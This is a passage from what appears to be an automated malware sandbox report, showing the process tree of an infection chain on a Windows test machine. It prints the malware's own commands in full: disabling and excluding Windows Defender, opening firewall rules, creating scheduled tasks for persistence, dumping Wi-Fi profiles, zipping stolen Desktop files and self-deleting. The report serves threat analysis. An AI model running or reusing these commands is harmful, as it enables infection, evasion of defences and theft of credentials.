        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7136
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:2832
        
        C:\Users\Admin\Pictures\zFin8p9T2XaFxNzDfLsRDA3Q.exe
        
        "C:\Users\Admin\Pictures\zFin8p9T2XaFxNzDfLsRDA3Q.exe"
        8⤵
        Windows security bypass
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        
        PID:7048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1348
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:2700
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:5056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:6960
        
        C:\Users\Admin\Pictures\PdLV4NcQzwxOS6sHtzFXCla9.exe
        
        "C:\Users\Admin\Pictures\PdLV4NcQzwxOS6sHtzFXCla9.exe"
        7⤵
        Executes dropped EXE
        
        PID:6072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:652
        
        C:\Users\Admin\Pictures\PdLV4NcQzwxOS6sHtzFXCla9.exe
        
        "C:\Users\Admin\Pictures\PdLV4NcQzwxOS6sHtzFXCla9.exe"
        8⤵
        Checks for VirtualBox DLLs, possible anti-VM trick
        
        PID:7036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4736
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:6968
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:2652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        Modifies data under HKEY_USERS
        
        PID:4460
        
        C:\Users\Admin\Pictures\5Gh6FarKzvCmEvFvlH608SC5.exe
        
        "C:\Users\Admin\Pictures\5Gh6FarKzvCmEvFvlH608SC5.exe"
        7⤵
        Modifies firewall policy service
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5460
        
        C:\Users\Admin\Pictures\jTVmg0EqDO0h2QAR8MR1Qr6z.exe
        
        "C:\Users\Admin\Pictures\jTVmg0EqDO0h2QAR8MR1Qr6z.exe"
        7⤵
        Executes dropped EXE
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\7zS1AD6.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:5456
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:5776
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:5048
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:5396
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:5908
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:5864
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:6076
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:1432
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:2640
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:5220
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:5408
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:5928
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:5400
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:5908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4184
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:6440
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:5208
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6292
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 00:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS1AD6.tmp\Install.exe\" it /NjUdidkyuY 385118 /S" /V1 /F
        9⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:5188
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:7052
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:7044
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:4132
        
        C:\Users\Admin\Pictures\GETF3fA7tgYghzB6TkHXZYFG.exe
        
        "C:\Users\Admin\Pictures\GETF3fA7tgYghzB6TkHXZYFG.exe"
        7⤵
        Executes dropped EXE
        
        PID:4052
        
        C:\Users\Admin\AppData\Local\Temp\7zS5A50.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:5468
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:5552
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:6788
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:5256
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:96
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:5132
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:7056
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:7044
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:7140
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:6976
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:6952
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:6948
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:5940
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:5984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6796
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:6220
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:2672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5756
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:6740
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 00:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS5A50.tmp\Install.exe\" it /WzadidGqrI 385118 /S" /V1 /F
        9⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:4972
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:1968
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:5256
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:96
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:7140
    - - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5396
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5428
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:5252
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:5264
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:4212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\687926120302_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5436
    - - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5684
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5672
        
        C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1344
        
        C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5304
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        7⤵
        
        PID:5276
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5540
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:4124
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 504
        6⤵
        Program crash
        
        PID:5700
    - - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5172
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        
        PID:2672
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:6004
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        Executes dropped EXE
        
        PID:3728
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:5452
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        Executes dropped EXE
        
        PID:5596
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:6252
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        Executes dropped EXE
        
        PID:6300
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
        6⤵
        
        PID:6544
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        7⤵
        Launches sc.exe
        
        PID:6604
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClientC confirm
        7⤵
        Executes dropped EXE
        
        PID:6624
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete PiercingNetLink
        7⤵
        Launches sc.exe
        
        PID:6732
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove PiercingNetLink confirm
        7⤵
        Executes dropped EXE
        
        PID:6748
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
        7⤵
        Executes dropped EXE
        
        PID:6772
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start PiercingNetLink
        7⤵
        Executes dropped EXE
        
        PID:6800
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
        6⤵
        
        PID:6948
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLinks
        7⤵
        Launches sc.exe
        
        PID:6992
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLinks confirm
        7⤵
        Executes dropped EXE
        
        PID:7008
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
        7⤵
        Executes dropped EXE
        
        PID:7028
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLinks
        7⤵
        Executes dropped EXE
        
        PID:7044
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
        6⤵
        
        PID:7156
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:5992
    - - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
        5⤵
        Executes dropped EXE
        
        PID:5040
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:5440
      - C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000244001\ISetup8.exe"
        6⤵
        Executes dropped EXE
        
        PID:6188
        
        C:\Users\Admin\AppData\Local\Temp\u4rw.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u4rw.0.exe"
        7⤵
        
        PID:6664
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\u4rw.0.exe" & del "C:\ProgramData\*.dll"" & exit
        8⤵
        
        PID:6328
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        9⤵
        Delays execution with timeout.exe
        
        PID:5420
        
        C:\Users\Admin\AppData\Local\Temp\u4rw.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u4rw.1.exe"
        7⤵
        Checks SCSI registry key(s)
        
        PID:5408
      - C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000245001\toolspub1.exe"
        6⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        
        PID:6696
      - C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe"
        6⤵
        Executes dropped EXE
        
        PID:6772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3912
        
        C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000246001\4767d2e713f2021e8fe856e3ea638b58.exe"
        7⤵
        
        PID:4124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6024
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        8⤵
        
        PID:2568
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        9⤵
        Modifies Windows Firewall
        
        PID:2736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5020
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5864
- - C:\Users\Admin\AppData\Local\Temp\1000020001\2702c48058.exe
    "C:\Users\Admin\AppData\Local\Temp\1000020001\2702c48058.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:2788
- - C:\Users\Admin\1000021002\9b90a2ae82.exe
    "C:\Users\Admin\1000021002\9b90a2ae82.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4136
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
